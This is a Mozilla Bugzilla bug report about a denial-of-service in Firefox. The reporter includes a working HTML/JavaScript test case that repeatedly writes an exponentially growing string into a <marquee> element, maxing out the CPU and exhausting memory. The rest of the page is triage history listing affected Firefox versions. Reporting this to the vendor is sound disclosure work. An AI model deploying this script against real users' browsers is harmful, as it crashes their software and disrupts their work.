Open Bug 620492 Opened 14 years ago Updated 2 years ago

DoS with long string in <marquee>

Categories

(Core :: DOM: Core & HTML, defect, P5)

Product:
Core
Component:
DOM: Core & HTML
Type:
defect

Tracking

()

Tracking Flags:
Tracking Status
blocking2.0 --- -
status2.0 --- wanted
status1.9.2 --- ?
status1.9.1 --- ?
firefox-esr78 --- affected
firefox85 --- affected
firefox86 --- affected
firefox87 --- affected

People

(Reporter: c750299, Unassigned)

References

Details

(Keywords: testcase, Whiteboard: [sg:dos])

Attachments

(1 file)

Testcase (WARNING: this will use 100% CPU and eat your memory)
285 bytes, text/html
Details 
User-Agent:       Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc14 Firefox/3.6.13
Build Identifier: 

This script can shut down browsers.
It was seen in the wild, yesterday, on multiple sites.

<html>
<head/><body onload="javascript:DoS();"></body>
<script> 
function DoS() {
var buffer = '\x42';
for (i =0;i<666;i++) {
buffer+=buffer+'\x42';
document.write('<html><marquee><h1>'+buffer+buffer);
}
}
</script>
</html>


Reproducible: Always




Maybe the browser can detect this and not stop working?
Group: core-security
Component: General → DOM
Product: Firefox → Core
QA Contact: general → general
Summary: Denial-of-Service script → DoS with long string in <marquee>
Whiteboard: [sg:dos]
Affecting 3.5, 3.6 and trunk.
Status: UNCONFIRMED → NEW
blocking2.0: --- → ?
status1.9.1: --- → ?
status1.9.2: --- → ?
status2.0: --- → ?
Ever confirmed: true
Version: unspecified → Trunk
Keywords: testcase
Severity: normal → critical
blocking2.0: ? → -
status2.0: ?wanted
https://bugzilla.mozilla.org/show_bug.cgi?id=1472046

Move all DOM bugs that haven’t been updated in more than 3 years and has no one currently assigned to P5.

If you have questions, please contact :mdaly.
Priority: -- → P5
Component: DOM → DOM: Core & HTML

This bug is also reproducible in windows10 64 and affects:
Firefox Release 85
Firefox ESR 78.7.0
Nightly 87.0a1
Beta 86.0b4

status-firefox85: --- → affected
status-firefox86: --- → affected
status-firefox87: --- → affected
status-firefox-esr78: --- → affected

In the process of migrating remaining bugs to the new severity system, the severity for this bug cannot be automatically determined. Please retriage this bug using the new severity system.

Severity: critical → --
Severity: -- → S3
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: